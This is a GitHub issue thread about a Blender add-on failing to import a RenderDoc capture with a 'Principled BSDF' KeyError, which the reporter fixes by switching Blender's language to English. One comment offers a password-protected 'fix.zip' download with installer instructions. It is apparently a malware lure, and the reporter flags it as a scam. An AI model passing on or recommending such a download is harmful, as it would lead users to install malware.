### ISSUE TITLE
Cannot import RDC file

### ISSUE THREAD

**Issue by Rixolino** [eliemichel/MapsModelsImporter#332]
Hi, I'm having RDC file issue:

[The .rdc file](https://mega.nz/file/czJkAICJ#bi6tKY72LZSGgSmWAp2JFdycXhF0_s6_-suMEOvFDEk)
D3D11
Version of this add-on: 0.70
Version of RenderDoc: 1.31
Version of Blender: 4.11

When I'm attempting to import the rdc file, it does to the partial work because there's this error: Python: Traceback (most recent call last):
  File "C:\Users\_\AppData\Roaming\Blender Foundation\Blender\4.1\scripts\addons\MapsModelsImporter\operators.py", line 60, in execute
    importCapture(context, self.filepath, self.max_blocks, self.use_experimental, pref)
  File "C:\Users\_\AppData\Roaming\Blender Foundation\Blender\4.1\scripts\addons\MapsModelsImporter\google_maps.py", line 373, in importCapture
    filesToBlender(context, prefix, max_blocks, use_experimental)
  File "C:\Users\_\AppData\Roaming\Blender Foundation\Blender\4.1\scripts\addons\MapsModelsImporter\google_maps.py", line 350, in filesToBlender
    addImageMaterial(mat_name, obj, img)
  File "C:\Users\_\AppData\Roaming\Blender Foundation\Blender\4.1\scripts\addons\MapsModelsImporter\google_maps.py", line 216, in addImageMaterial
    principled = nodes["Principled BSDF"]
                 ~~~~~^^^^^^^^^^^^^^^^^^^
KeyError: 'bpy_prop_collection[key]: key "Principled BSDF" not found'

It's too strange the when I turn the rendering to visual rendering, it doesn't charge the textures 

https://github.com/user-attachments/assets/aca0d506-39e4-424d-a9e8-bc9fc65c61da

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Rixolino** [comment]
> Download https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file password: changeme In the installer menu, select "gcc."

BE ALLERTED OF THIS SCAM
https://app.any.run/tasks/f1effe8e-15ca-49ef-be52-61844d6a07d9

**Comment by Rixolino** [comment]
It's fixed by changing language to English
